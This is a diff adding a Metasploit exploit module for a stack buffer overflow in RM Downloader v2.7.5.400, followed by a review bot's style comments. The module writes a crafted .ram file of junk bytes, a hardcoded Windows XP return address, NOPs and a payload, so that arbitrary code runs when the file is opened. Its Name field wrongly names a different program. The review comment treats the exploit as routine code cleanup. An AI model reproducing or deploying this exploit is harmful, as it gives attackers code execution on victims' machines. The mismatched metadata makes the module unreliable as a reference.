@@ -0,0 +1,79 @@ +### +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow (MSF) +#[+] Date: 25-03-2015 +#[+] Type: Local Exploits +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe +#[+] Twitter: @TCYB3R +## + +## +# $Id: rmdownloader_bof.rb 2015-04-01 03:03 TUNISIAN CYBER $ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit', + 'Description' => %q{ + This module exploits a stack buffer overflow in RM Downloader v2.7.5.400 + creating a specially crafted .ram file, an attacker may be able + to execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'TUNISIAN CYBER', # Original + 'TUNISIAN CYBER' # MSF Module + ], + 'Version' => 'Version 2.7.5.400', + 'References' => + [ + [ 'URL', 'https://www.exploit-db.com/exploits/36502/' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x0a\x0d", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP-SP3 (EN)', { 'Ret' => 0x7C9D30D7} ] + ], + 'Privileged' => false, + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.ram']), + ], self.class) + end + + def exploit + + sploit = rand_text_alphanumeric(35032) # Buffer Junk + sploit << [target.ret].pack('V') + sploit << make_nops(4) + sploit << payload.encoded + + tc = sploit + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(tc) + + end + +end + \ No newline at end of file
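Review bot: The `'Name'` in `initialize` reads `'Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit'`, which contradicts the `'Description'`, the header comment and the `$Id` line, all of which name RM Downloader v2.7.5.400; it appears to be left over from another module and should read `'Name' => 'RM Downloader 2.7.5.400 Local Buffer Overflow',`. The `'Author'` array lists `'TUNISIAN CYBER'` twice with different trailing comments; one entry is enough. The module carries no `'DisclosureDate'` even though the header comment gives a date of 25-03-2015, so that key should be added alongside `'References'`.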